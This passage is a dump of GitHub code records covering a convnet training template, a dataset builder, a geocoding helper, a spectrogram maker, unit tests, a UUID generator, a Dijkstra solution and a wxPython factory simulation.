\"1h\" being parsed as 1:00am for example.\n \"PARSERS\": [\n \"relative-time\",\n \"timestamp\",\n \"custom-formats\",\n \"absolute-time\",\n \"no-spaces-time\",\n ],\n },\n )\n\n if dt:\n delta = ceil(dt.timestamp() - datetime.datetime.now().timestamp())\n\n return (delta, str(datetime.timedelta(seconds=delta)))\n\n return None, None\n","repo_name":"SSBUTrainingGrounds/Tabuu-3.0","sub_path":"utils/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"11034176800","text":"#!/usr/bin/env python\n\n\"\"\"\n convnet/main.py\n\"\"\"\n\nimport sys\nimport json\nimport argparse\nimport numpy as np\nfrom time import time\n\n# --\n# User code\n# Note: Depending on how you implement your model, you'll likely have to change the parameters of these\n# 
functions. The way they're shown is just one possible way that the code could be structured.\n\ndef make_model(input_channels, output_classes, residual_block_sizes, scale_alpha, optimizer, lr, momentum):\n # ... your code here ...\n return model\n\n\ndef make_train_dataloader(X, y, batch_size, shuffle):\n # ... your code here ...\n return dataloader\n\n\ndef make_test_dataloader(X, batch_size, shuffle):\n # ... your code here ...\n return dataloader\n\n\ndef train_one_epoch(model, dataloader):\n # ... your code here ...\n return model\n\n\ndef predict(model, dataloader):\n # ... your code here ...\n return predictions\n\n# --\n# CLI\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--cuda', action=\"store_true\")\n parser.add_argument('--num-epochs', type=int, default=5)\n parser.add_argument('--lr', type=float, default=0.1)\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--batch-size', type=int, default=128)\n return parser.parse_args()\n\nif __name__ == '__main__':\n args = parse_args()\n \n # --\n # IO\n \n # X_train: tensor of shape (number of train observations, number of image channels, image height, image width)\n # X_test: tensor of shape (number of test observations, number of image channels, image height, image width)\n # y_train: vector of [0, 1] class labels for each train image\n # y_test: vector of [0, 1] class labels for each test image (don't look at these to make predictions!)\n \n X_train = np.load('data/cifar2/X_train.npy')\n X_test = np.load('data/cifar2/X_test.npy')\n y_train = np.load('data/cifar2/y_train.npy')\n y_test = np.load('data/cifar2/y_test.npy')\n \n # --\n # Define model\n \n model = make_model(\n input_channels=3,\n output_classes=2,\n residual_block_sizes=[\n (16, 32),\n (32, 64),\n (64, 128),\n ],\n scale_alpha=0.125,\n optimizer=\"SGD\",\n lr=args.lr,\n momentum=args.momentum,\n )\n \n # --\n # Train\n \n t = time()\n for epoch in range(args.num_epochs):\n \n # Train\n model = train_one_epoch(\n model=model,\n dataloader=make_train_dataloader(X_train, y_train, batch_size=args.batch_size, shuffle=True)\n )\n \n # Evaluate\n preds = predict(\n model=model,\n dataloader=make_test_dataloader(X_test, batch_size=args.batch_size, shuffle=False)\n )\n \n assert isinstance(preds, np.ndarray)\n assert preds.shape[0] == X_test.shape[0]\n \n test_acc = (preds == y_test.squeeze()).mean()\n \n print(json.dumps({\n \"epoch\" : int(epoch),\n \"test_acc\" : test_acc,\n \"time\" : time() - t\n }))\n sys.stdout.flush()\n \n elapsed = time() - t\n print('elapsed', elapsed, file=sys.stderr)\n \n # --\n # Save results\n \n import os # needed for makedirs below; os was not imported at the top of this script\n os.makedirs('results', exist_ok=True)\n \n np.savetxt('results/preds', preds, fmt='%d')\n open('results/elapsed', 'w').write(str(elapsed))","repo_name":"prog-eval/prog-eval","sub_path":"convnet/main-redacted.py","file_name":"main-redacted.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"9264425659","text":"\"\"\"\nMain script for creating datasets.\nSome parameters are more important than others:\n- WIDTH: Width of images in dataset\n- HEIGHT: Height of images in dataset\n- SYNTHETIC_RATIO: Synthetic:real, the ratio of synthetic bricks to real bricks.
\n Set this to a high value since the number of real brick cutouts is relatively small.\n- SIZE: Number of images in dataset.\n\"\"\"\n\nimport build_dataset as build\nimport augment_dataset as augment\n\n# Select whether to generate dataset A and/or dataset B.\nGENERATE_A = True\nGENERATE_B = True\n\n# Directories for backgrounds and brick cutouts.\nBACKGROUNDIR_GRAY = \"data/backgrounds/gray\"\nBACKGROUNDIR_WILD = \"data/backgrounds/wild\"\nDATADIR_SYNTHETIC = \"data/bricks_3D\" \nDATADIR_RAW = \"data/bricks_photo\"\nPIECES = [\"2540\", \"3001\", \"3003\", \"3004\", \"3020\", \"3021\", \"3022\", \"3023\", \"3039\", \"3660\"]\n\n# Write directories. Change these between runs if you don't want to overwrite an earlier dataset.\nWRITEDIR_A = \"data/datasets/A\"\nWRITEDIR_B = \"data/datasets/B\"\n\n# Parameters\nWIDTH = 600\nHEIGHT = 400\nSYNTHETIC_RATIO = 10\nSIZE = 10\n\nif GENERATE_A:\n # GENERATE\n build.build_dataset(BACKGROUNDIR_WILD, PIECES, DATADIR_SYNTHETIC, DATADIR_RAW, SIZE,\n WRITEDIR_A, idx=0, synt_ratio=SYNTHETIC_RATIO, back_width=WIDTH, \n back_height=HEIGHT, colour=\"random\", rotation='random',placement_style=\"random\")\n\n # AUGMENT\n augment.augment_dataset(WRITEDIR_A, add_noise=True, add_blur=True, \n add_motion_blur=True, to_black_and_white=False, noise_mean=0, noise_std=0.1, \n blur_kernel=(1,1), motion_blur_dir=\"horizontal\", motion_blur_factor=3, overwrite=True)\n\nif GENERATE_B:\n # GENERATE\n build.build_dataset(BACKGROUNDIR_GRAY, PIECES, DATADIR_SYNTHETIC, DATADIR_RAW, SIZE, \n WRITEDIR_B, idx=0, synt_ratio=SYNTHETIC_RATIO, back_width=WIDTH, \n back_height=HEIGHT, colour=\"grey\", rotation='random',placement_style=\"uniform\")\n\n # AUGMENT\n augment.augment_dataset(WRITEDIR_B, add_noise=False, add_blur=False, \n add_motion_blur=True, to_black_and_white=True, noise_mean=0, noise_std=0, \n blur_kernel=(1,1), motion_blur_dir=\"horizontal\", motion_blur_factor=10, overwrite=True)","repo_name":"mndahlen/CS433-LEGO-DETECTION","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74554478865","text":"import requests\n\ndef procurar(nomeLugar):\n base_url = \"https://nominatim.openstreetmap.org/search\"\n \n params = {\n \"q\": nomeLugar,\n \"format\": \"json\"\n }\n \n response = requests.get(base_url, params=params)\n data = response.json()\n \n if data:\n first_result = data[0]\n address = first_result.get(\"display_name\")\n print(\"Endereço:\", address)\n return address\n else:\n print(\"Local não encontrado.\")","repo_name":"Luiz-Dinani/Anonimizador-Tilapias","sub_path":"services_references/openMapAPI.py","file_name":"openMapAPI.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34070284871","text":"# for file utilities\nimport os.path\n# for visualizing the data\nimport matplotlib.pyplot as plt\n# for .wav file handling\nimport scipy.io.wavfile as wavfile\n\n\ndef make_spectrogram(file_path, destination_folder):\n # Extract file name from path\n file_name = os.path.basename(file_path)\n\n # Read given .wav file data\n print('Reading: ' + file_name)\n fs, aud = wavfile.read(file_path)\n print(aud.shape)\n\n # Select left channel only\n if len(aud.shape) > 1:\n aud = aud[:, 0]\n\n # Keep only the first 5 seconds\n if aud.shape[0] > int(fs*5):\n first = aud[:int(fs*5)]\n else:\n first = aud\n\n # Create spectrogram plot\n power_spectrum, 
frequencies_sound, time, image_axis = plt.specgram(first, Fs=fs)\n plt.axis('off')\n\n # Check for destination folder\n # Create destination folder if none exists\n if not os.path.isdir(destination_folder):\n os.mkdir(destination_folder)\n\n # Save spectrogram image\n image_name = file_name[:-4] + '.png'\n print('Writing ' + image_name + ' to ' + destination_folder)\n plt.savefig(os.path.join(destination_folder, image_name), bbox_inches='tight', pad_inches=0)\n\n\nif __name__ == '__main__':\n make_spectrogram('Boredom.wav', 'images/')\n","repo_name":"mattferral/spectrogram_maker","sub_path":"spectrogram.py","file_name":"spectrogram.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25946853401","text":"#!/usr/bin/python3\n'''\nFunction to add two numbers (integer or float)\n'''\n\n\ndef add_integer(a, b=98):\n '''\n add integer function definition\n '''\n if type(a) != int and type(a) != float:\n raise TypeError(\"a must be an integer\")\n if type(b) != int and type(b) != float:\n raise TypeError(\"b must be an integer\")\n return int(a + b)\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testfile(\"tests/0-add_integer.txt\")\n","repo_name":"davidajimati/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41126921585","text":"from Helper import *\nclass MetricsticsCalculation:\n # Static method to calculate the minimum value in the given data\n @staticmethod\n def get_min(data,number):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n minimum_value = data[0]\n for value in data:\n if value < minimum_value:\n minimum_value = value\n return minimum_value\n # Static method to calculate the maximum value in the given data\n @staticmethod\n def get_max(data,number):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n maximum_value = data[0]\n for value in data:\n if value > maximum_value:\n maximum_value = value\n return maximum_value\n # Static method to calculate the mean value in the given data\n @staticmethod\n def get_mean(data,count):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n\n total = 0\n for value in data:\n total += value\n\n return total / count\n # Static method to calculate the mean absolute deviation (MAD) of the given data\n @staticmethod\n def get_mad(data,n):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n\n # mean calculation of the given data set.\n mean = MetricsticsCalculation.get_mean(data,n) \n # Calculate the total absolute deviation \n total_deviation = 0\n for x in data:\n diff = x - mean\n total_deviation += diff if diff >= 0 else -diff\n\n mad = total_deviation / n\n return mad\n # Static method to calculate the median value in the given data\n @staticmethod\n def get_median(data,number):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n \n # Sorting using merge sort (via Helper)\n data = Helper.merge_sort(data)\n\n # Calculate the median based on the sorted data set.\n if number % 2 == 0:\n middle1 = data[number // 2 - 1]\n middle2 = data[number // 2]\n return 
(middle1 + middle2) / 2\n else:\n return data[number // 2] \n \n # Static method to calculate the mode value in the given data\n @staticmethod\n def get_mode(data,n):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n\n counts = {}\n max_count = 0\n mode = []\n\n for x in data:\n if x in counts:\n counts[x] += 1\n else:\n counts[x] = 1\n\n if counts[x] > max_count:\n max_count = counts[x]\n\n for key in counts:\n value = counts[key]\n if value == max_count:\n if not mode:\n mode = [key]\n else:\n mode = mode + [key]\n\n return mode\n \n # Static method to calculate the standard deviation value in the given data\n @staticmethod\n def get_stddev(data,n):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n\n mean = MetricsticsCalculation.get_mean(data,n)\n total_squared_deviation = 0\n\n for value in data:\n total_squared_deviation += (value - mean) ** 2\n\n return (total_squared_deviation / n) ** 0.5\n","repo_name":"bhargav0425/SM_Group_L","sub_path":"METRICSTICS/Code/MetricsticsCalculation.py","file_name":"MetricsticsCalculation.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14914286456","text":"import unittest\n\nfrom storm.locals import *\nfrom storm.exceptions import IntegrityError\n\nfrom bosco.runner import Runner, RunnerException, SICard\n\nclass RunnerTest(unittest.TestCase):\n\n # Create store as class variable so that every test uses the same\n # database connection\n _store = Store(create_database('postgres:bosco_test'))\n\n def tearDown(self):\n # Clean up Database\n self._store.rollback()\n\n def testStoreAdd(self):\n \"\"\"\n Test that a runner is added to the store if a store is given to the\n constructor.\n \"\"\"\n r = Runner(u'Bernasconi', u'Maria')\n self.assertEquals(Store.of(r), None)\n self._store.add(r)\n self.assertEquals(Store.of(r), self._store)\n\n def testDoubleSICard(self):\n \"\"\"\n Test that creating two SICard objects with the same id raises an error.\n \"\"\"\n\n r1 = self._store.add(Runner(u'Hans', u'Muster', SICard(987655)))\n r2 = self._store.add(Runner(u'Bernasconi', u'Maria', SICard(987655)))\n self.assertRaises(IntegrityError, self._store.flush)\n\n def testMultipleSICards(self):\n \"\"\"\n Runners can have multiple SI-cards.\n \"\"\"\n \n s1 = SICard(987655)\n r = self._store.add(Runner(u'Hans', u'Muster', s1))\n s2 = SICard(765444)\n r.sicards.add(s2)\n self.failUnless(s1 in r.sicards and s2 in r.sicards)\n\n def testReassignFails(self):\n \"\"\"\n Test that reassign an already assign SICard fails.\n \"\"\"\n\n si = SICard(987655)\n r1 = self._store.add(Runner(u'Hans', u'Muster', si))\n r2 = self._store.add(Runner(u'Bernasconi', u'Maria', SICard(765444)))\n self._store.flush()\n self.assertRaises(RunnerException, r2.sicards.add, si)\n\n def testUnassignAssign(self):\n \"\"\"\n First unassigning an SI-card and the assigning to another runner\n should work.\n \"\"\"\n si = SICard(987655)\n r1 = self._store.add(Runner(u'Hans', u'Muster', si))\n r2 = self._store.add(Runner(u'Bernasconi', u'Maria', SICard(765444)))\n r1.sicards.remove(si)\n try:\n r2.sicards.add(si)\n self._store.flush()\n except RunnerException:\n self.fail(\"RunnerException raised although SI-card reassignment should \"\n \"work.\")\n self.failUnless(si in r2.sicards)\n\n def testReassigSame(self):\n \"\"\"\n Test that reassigning an SI-card to the same runner it 
is already assigned\n works.\n \"\"\"\n si = SICard(987655)\n r = self._store.add(Runner(u'Hans', u'Muster', si))\n try:\n r.sicards.add(si)\n self._store.flush()\n except RunnerException:\n self.fail(\"RunnerException raised although SI-card reassignment should \"\n \"work.\")\n self.failUnless(si in r.sicards)\n\n \n","repo_name":"gaudenz/bosco","sub_path":"bosco/test/runner_test.py","file_name":"runner_test.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42497565435","text":"import streamlit as st\nimport stream.plotstream as grap\nimport stream.predict as pred\nfrom datatable import dt, f\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport organizing.data_organize as org\nimport organizing.plotting as pl\nimport linear_model.ransac_model as rm\nimport organizing.cleaningNaN as clean\nimport linear_model.standarderror as stde\nimport pandas as pd\n\nlink = \"../Data/2018_2022_24.csv\"\ndata = org.organize(link, False)\ncode = [\"ATL\", \"CSG\", \"ABY\", \"VLD\", \"BQK\", \"SAV\", \"AGS\"]\nairports_sigla = [\"Atlanta\", \"Columbus\", \"Sur Oeste Regional\",\n \"Valdosta\", \"Brunswick Golden\", \"Savannah/Hilton\",\n \"Regional Augusta\"]\nstyle = [\"Observar modelo\",\"Predecir\"]\nprint(data.head())\nestilo = st.sidebar.selectbox(\"¿Qué desea hacer?\", style)\ntipo = st.sidebar.selectbox(\"Seleccione el aeropuerto:\", airports_sigla)\ndata_selected = org.select_specific(data, f.DEST,\n code[airports_sigla.index(tipo)])\nif estilo == style[0]:\n st.header(\"MODELO DEL AEROPUERTO\")\n st.header(tipo)\nelif estilo == style[1]:\n st.header(\"PREDICCIÓN DE RETRASO DE ATERIZAJE EN EL AEROPUERTO\")\n st.header(tipo)\nst.write(\"Cantidad de datos de\",tipo, \"es de\", data_selected.shape[0], \"Datos.\")\n\n\nX, Y = clean.clean(data_selected[\"DEP_DELAY\"].to_list(),\n data_selected[\"ARR_DELAY\"].to_list())\nmodel = rm.model_linear(X, Y)\n\nwhile (model.score(X, Y) < 0.9):\n model = rm.model_linear(X, Y)\n\nst.write(\"La precisión del retraso de vuelo de llegada es del \",\n round(model.score(X, Y)*100,1), \"% de las veces.\")\n\nberror, merror = stde.standarderror(X, Y, model)\nm = model.estimator_.coef_[0][0]\nb = model.estimator_.intercept_[0]\nif estilo == style[0]:\n grap.graficar(X,Y,m,merror,b,berror)\nelif estilo == style[1]:\n pred.predecir(m,b,merror,berror)\n","repo_name":"Juanita1345/PF-G09","sub_path":"Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17381541152","text":"#Problem : 2016 Qualifiers - Travel to the West\r\n#Language : Python 3\r\n#Compiled Using : py_compile\r\n#Version : Python 3.4.3\r\n#Input for your program will be provided from STDIN\r\n#Print out all output from your program to STDOUT\r\n\r\nimport sys\r\n\r\nN = int(input())\r\nairToDest = {} # il grafo, considerato NON ORIENTATO\r\nvisited = {}\r\nfor n in range(N):\r\n couple = input().split()\r\n if couple[0] not in airToDest:\r\n airToDest[couple[0]] = [couple[1]]\r\n else:\r\n airToDest[couple[0]].append(couple[1])\r\n if couple[1] not in airToDest:\r\n airToDest[couple[1]] = []\r\n visited[couple[0]] = 0\r\n visited[couple[1]] = 0\r\n \r\n \r\n\r\npaths = 0\r\ndef solve(graph, currAir, N, visited):\r\n global paths\r\n visited[currAir] = 1\r\n if currAir == \"SFO\":\r\n paths += 1\r\n return\r\n for dest in airToDest[currAir]:\r\n if not 
visited[dest]:\r\n solve(graph, dest, N, visited.copy()) # ATTENZIONE, UNA COPIA DI VISITED?\r\n \r\nsolve(airToDest, \"JFK\", N, visited)\r\nprint(paths)\r\n","repo_name":"FiorixF1/bloomberg-codecon","sub_path":"Challenger Series/Travel to the West.py","file_name":"Travel to the West.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9656305004","text":"import random\nimport sys\nimport socket\nimport hashlib\nfrom datetime import datetime\n\ndef make_node():\n\n\t# The RFC4122 spec says that if it's not possible to get the MAC addresses of the host\n\t# one option is to take as many information that identify this node and hash them together.\n\t# The IP address of the node is useful for this purpouse.\n\tip_address = [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]\n\t\t\t\n\thash = md5_hash(ip_address)\n\tnode = 0\n\tfor i in range(min(6, len(hash))):\n\t\tif type(hash[i]) is int:\n\t\t\tnode |= (0x00000000000000ff & hash[i]) << (5 - i) * 8\n\t\telse:\n\t\t\tnode |= (0x00000000000000ff & ord(hash[i])) << (5 - i) * 8\n\n\t# As we don't use the mac address, the multicast bit must be 1\n\treturn node | 0x0000010000000000\n\t\ndef md5_hash(ip_address):\n\thash = hashlib.md5()\n\thash.update(ip_address.encode('utf-8'))\t\t\n\treturn hash.digest()\t\n\t\ndef digits(value, bytes_nr):\n return value & digits_masks[bytes_nr]\n\t\ndef datetime_to_nanos(dt):\n\tdelta = dt - epoch\n\treturn (delta.days * 86400 + delta.seconds) * 10000000 + (delta.microseconds * 10)\n\t\ndef get_time_based_blocks(dt, nanos_to_add):\n\n\t# Convert millis to nanos\n\tnanos = datetime_to_nanos(dt)\n \n\t# Add random nanoseconds\n\tif (nanos_to_add > 0):\n\t\tnanos += nanos_to_add\n\t\t\n\treturn digits(nanos >> 32, 8), digits(nanos >> 16, 4), digits(nanos, 4)\n\ndef get_clock_seq_and_node():\n\n\tclock = random.randint(0, sys.maxsize)\t\n\tclock_seq_and_node = 0\n\tclock_seq_and_node |= 0x8000000000000000 # Variant\n\tclock_seq_and_node |= (clock & 0x0000000000003FFF) << 48\n\tclock_seq_and_node |= _node\n\n\treturn digits(clock_seq_and_node >> 56, 2), digits(clock_seq_and_node >> 48, 2), digits(clock_seq_and_node, 12)\n\t\n_node = make_node()\nepoch = datetime(1970, 1, 1)\ndigits_masks = { 2: 0xFF, 4: 0xFFFF, 8: 0xFFFFFFFF, 12: 0xFFFFFFFFFFFF }","repo_name":"dive-tv/python-uuid1","sub_path":"uuid1/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7189940698","text":"# 1916. 
최소비용 구하기\n\ndef dijkstra(start):\n DP[start] = 0 # 시작 비용 0으로\n heap = []\n heapq.heappush(heap, [0, start]) # heapq는 작은 것 순서대로 정렬함(따라서 (비용, node)에서 순서 바꾸면 안됨)\n while heap: # heap이 없을 때까지\n node_cost, node = heapq.heappop(heap)\n if DP[node] < node_cost: # 시작지점에서 해당 node값으로 이동하는 비용이 기존 DP값보다 큰 경우\n continue # 아래 for문 안 돌음\n for next, cost in bus[node]: # 해당 node에서 이동할 수 있는 것 반복\n next_cost = node_cost + cost # 현재 노드까지 비용 + 다음 노드로 이동 비용\n if DP[next] > next_cost: # 현재 노드에서 이동한 비용이 다음 노드의 비용보다 작은 경우\n DP[next] = next_cost # 비용 변경\n heapq.heappush(heap, [next_cost, next]) # 다음 노드 저장\n\nimport sys\nimport heapq\n\nsys.setrecursionlimit(10**6)\ninput = sys.stdin.readline\nN = int(input())\nM = int(input())\nbus = [[] for _ in range(N+1)]\nDP = [10**8 for _ in range(N+1)] # 비용을 저장하는데 다익스트라 알고리즘이므로 최대값으로 초기화(최대 node 1000개, 최대 비용 100000이므로 10*8으로 설정)\n\nfor _ in range(M):\n x, y, c = map(int, input().split())\n bus[x].append([y, c]) # 다익스트라를 위해 x에 [y, c]를 저장\n\nfirst, last = map(int, input().split())\n\ndijkstra(first) # 시작 지점부터 시작\nprint(DP[last])","repo_name":"Yookaser/Algorithm","sub_path":"Backjoon/11_G5/bj1916.py","file_name":"bj1916.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8689562045","text":"# cook your dish here\nfor _ in range(int(input())):\n n=int(input())\n lst=list(map(int,input().split()))\n ans=list()\n nm=0\n for i in range(n):\n if i==0:\n nm=lst[0]&lst[1]\n elif i==(n-1):\n nm=lst[i]&lst[i-1]\n else:\n nm=max(lst[i]&lst[i-1],lst[i]&lst[i+1])\n ans.append(nm)\n print(*ans)","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"MAXDMGE.py","file_name":"MAXDMGE.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"fa","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"30199439574","text":"from setuptools import setup\n\nimport os\n\n\ndef is_package(path):\n return (\n os.path.isdir(path) and\n os.path.isfile(os.path.join(path, '__init__.py'))\n )\n\n\ndef find_packages(path, base=\"\" ):\n \"\"\" Find all packages in path \"\"\"\n packages = {}\n for item in os.listdir(path):\n dir = os.path.join(path, item)\n if is_package( dir ):\n if base:\n module_name = \"%(base)s.%(item)s\" % vars()\n else:\n module_name = item\n packages[module_name] = dir\n packages.update(find_packages(dir, module_name))\n return packages\n\n\ndef read_requirements(filename):\n \"\"\"\n Get application requirements from\n the requirements.txt file.\n :return: Python requirements\n :rtype: list\n \"\"\"\n with open(filename, 'r') as req:\n requirements = req.readlines()\n install_requires = [r.strip() for r in requirements if r.find('git+') != 0]\n return install_requires\n\n\ndef read(filepath):\n \"\"\"\n Read the contents from a file.\n :param str filepath: path to the file to be read\n :return: file contents\n :rtype: str\n \"\"\"\n with open(filepath, 'r') as f:\n content = f.read()\n return content\n\n\npackages = find_packages(\".\")\nrequirements = read_requirements('requirements/prod.txt')\n\n\nsetup(\n name='colin_api',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n include_package_data=True,\n license=read('LICENSE'),\n long_description =read('README.md'),\n install_requires=requirements,\n setup_requires=[\n 'pytest-runner',\n ],\n tests_require=[\n 'pytest',\n 
],\n)\n","repo_name":"bcgov/lear","sub_path":"colin-api/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"6586371951","text":"'''\n类定义文件\n用于定义类\n'''\nimport wx\nimport random\nimport winsound\n\nimport var\n\n\n\n\nclass factory(object):\n '''一个unit的控件集合类'''\n def __init__(self,panel,类型,产量 = 10):\n #self.工人数 = 0 #本来应该是unit的属性,但是为了方便按钮事件,设为unit的gui的属性\n\n self.__单人产量 = 产量 # 单位产出\n self.grid = wx.GridBagSizer(2,2) \n self.panel = ''\n 名称 = 'F_' +类型\n self.信息={'资金':0,'类型':类型,'名称':名称, '储量':0,'人工':0}\n self.pf=var.pf[var.产品列表.index(类型)]\n\n def __创建label(self,panel,txt='txt',宽度=90,字体=20,颜色='#FFFFFF'):\n temp = wx.StaticText(panel, label=txt,size=(宽度,-1),style=wx.ALIGN_CENTRE)\n temp.SetBackgroundColour(颜色)\n font = wx.Font(字体,wx.FONTFAMILY_DEFAULT,wx.FONTSTYLE_NORMAL,wx.FONTWEIGHT_NORMAL)\n temp.SetFont(font)\n return temp\n\n\n def sub预算(self):\n # 被购买\n var.buy[self.信息['类型']] = self.get今日购买()\n print('buy',var.buy)\n # 生产\n var.out[self.信息['类型']] = self.__单人产量 * self.信息['人工']\n var.price[self.信息['类型']] = self.get今日价格()\n\n def sub结算(self):\n t = self.信息['类型']\n #for i in var.产品列表:\n # 购买\n # self.信息['资金'] -= var.buy[i] * var.price[i]\n # var.单位列表[var.产品列表.index(i)].信息['资金'] += var.buy[i] * var.price[i]\n self.信息['资金'] += self.get购买花费()\n self.信息['储量'] -= var.buy[t]\n # 生产\n self.信息['储量'] += var.out[self.信息['类型']]\n self.信息['资金'] += var.buy[t]* var.price[t]\n\n def addCtrls(self,panel):\n # row 1\n grid = self.grid\n\n self.head = self.__创建label(panel,\" \"+self.信息['类型'])\n grid.Add(self.head, pos=(0, 0),span=(1,4), flag=wx.EXPAND)\n #row 2\n self.w1 = self.__创建label(panel,\"worker\")\n self.w1.SetBackgroundColour('#FFFFFF')\n grid.Add(self.w1, pos=(1, 0), flag=wx.EXPAND)\n self.w2 = wx.StaticText(panel, label=\" 0\")\n self.w2.SetBackgroundColour('#FFFFFF')\n grid.Add(self.w2, pos=(1, 1), flag=wx.EXPAND)\n self.bt1 = wx.Button(panel, label=\"增加\")\n grid.Add(self.bt1, pos=(1, 2), flag=wx.EXPAND)\n self.bt1.Bind(wx.EVT_BUTTON, self.event)\n self.bt2 = wx.Button(panel, label=\"减少\")\n grid.Add(self.bt2, pos=(1, 3), flag=wx.EXPAND | wx.ALL)\n self.bt2.Bind(wx.EVT_BUTTON, self.event)\n # row 3\n self.r3_1 = wx.StaticText(panel, label=\"money :\")\n self.r3_1.SetBackgroundColour('#FFFFFF')\n grid.Add(self.r3_1, pos=(2, 0), flag=wx.EXPAND)\n self.r3_2 = wx.StaticText(panel, label=str(self.信息['资金']))\n self.r3_2.SetBackgroundColour('#FFFFFF')\n grid.Add(self.r3_2, pos=(2, 1), flag= wx.ALL)\n \n #########################\n # 右侧 绘图窗口\n image = wx.Image(\"捕获.png\")\n temp = image.Scale(100,100).ConvertToBitmap() # 缩放并转换为bitmap\n self.panel = wx.StaticBitmap(parent=panel,bitmap=temp,size=(100,100))\n #self.panel = wx.Panel(panel,size=(200,200))\n self.panel.SetBackgroundColour('#00aaaa')\n grid.Add(self.panel, pos=(0, 4),span=(3,1), border=10)\n self.w2.SetBackgroundColour('#00aaaa')\n \n def event(self,e):\n '''按钮事件,增加 1名worker'''\n if e.GetEventObject().Label == '增加' :\n self.信息['人工'] += 1\n else:\n self.信息['人工'] -= 1\n self.w2.SetLabel(str(self.信息['人工']))\n\n winsound.Beep(1500, 50) #(频率,持续时间)\n self.panel.Refresh()\n \n\n def get今日价格(self):\n return 1#random.randint(1,50)\n\n def get净利润(self):\n i = self.信息['类型']\n return (var.out[i] +var.buy[i])* var.price[i] + self.get购买花费()\n\n def get今日购买(self):\n rv = 0\n _id = var.产品列表.index(self.信息['类型'])\n for i in var.单位列表:\n # 计算每个单位需要的t 的量,然后累加\n try:\n rv += i.pf[self.信息['类型']] * i.信息['人工']\n except:\n rv += 0\n 
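            # Note: the bare except above covers the KeyError raised when a
            # unit's production function dict `pf` has no entry for this
            # product type; such units simply add nothing to today's demand.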
#print('ren',i.信息['人工'])\n return rv\n def get购买花费(self):\n l = list(self.pf.keys())\n rv=0\n for i in l:\n rv -= self.pf[i] *self.信息['人工']\n return rv\n\n def get净资产(self):\n return self.信息['资金'] + self.信息['储量']* var.price[self.信息['类型']]\n\n def get信息(self):\n #,'今日价格','购买花费'\n rv = []\n i = self.信息['类型']\n self.信息.update({ '产量':var.out[i] })\n self.信息.update({'出售':var.buy[self.信息['类型']]})\n self.信息.update({'今日价格':self.get今日价格()})\n self.信息.update({'购买花费':self.get购买花费() })\n self.信息.update({'今日产值':var.out[i] * var.price[i]})\n self.信息.update({ '净利润':self.get净利润() })\n self.信息.update({ '净资产': self. get净资产()})\n for i in var.信息表[0]:\n rv.append(self.信息[i])\n return rv\n\n def refresh(self):\n self.sub结算()\n self.sub预算()\n print('refresh ')\n #row 2\n self.w2.SetLabel(str(self.信息['人工']))\n # row 3\n self.r3_2.SetLabel(str(self.信息['资金'])) \n #########################\n # 右侧 绘图窗口\n image = wx.Image(\"捕获.png\")\n temp = image.Scale(100,100).ConvertToBitmap() # 缩放并转换为bitmap\n c='#'\n c += '{:0>2x}'.format(random.randint(0,255))\n c += '{:0>2x}'.format(random.randint(0,255))\n c += '{:0>2x}'.format(random.randint(0,255))\n c=wx.Colour(random.randint(0,255),random.randint(0,255),random.randint(0,255))\n print('color',c)\n self.w1.Refresh()\n self.w1.SetBackgroundColour(c)\n self.w2.SetBackgroundColour(c) \n 